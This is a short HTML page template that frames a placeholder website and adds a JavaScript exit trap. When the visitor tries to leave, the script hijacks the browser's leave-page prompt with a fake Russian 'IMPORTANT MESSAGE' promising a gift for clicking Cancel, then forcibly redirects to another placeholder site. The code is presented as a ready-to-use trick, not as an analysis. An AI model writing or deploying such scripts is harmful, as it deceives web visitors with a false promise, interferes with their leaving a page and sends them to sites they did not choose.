<html>
<head>
<title>Заголовок</title>
</head>
<frameset cols="100%,*" frameborder="no" border="0" framespacing="0">
<frame name="SiteShowFrame" src="
http://site.com">
</frameset>
<body>
<script language="javascript">
(function() {
setTimeout(function() {
var __redirect_to = '
http://site2.com';
var _tags = ['button', 'input', 'a'], _els, _i, _i2;
for(_i in _tags) {
_els = document.getElementsByTagName(_tags[_i]);
for(_i2 in _els) {
if((_tags[_i] == 'input' && _els[_i2].type != 'button' && _els
[_i2].type != 'submit' && _els[_i2].type != 'image') || _els[_i2].target ==
'_blank') continue;
_els[_i2].onclick = function() {window.onbeforeunload = function()
{};}
}
}
window.onbeforeunload = function() {
setTimeout(function() {
window.onbeforeunload = function() {};
setTimeout(function() {
document.location.href = __redirect_to;
}, 500);
},5);
return '***************************************\n\n В А Ж Н О Е С О О
Б Щ Е Н И Е:\n\n Кликните по кнопке ОТМЕНА/CANCEL, чтобы\n остаться на этой
странице и получить\n ПОДАРОК! \n
\n***************************************';
}
}, 500);
})();
</script>
</body>
</html>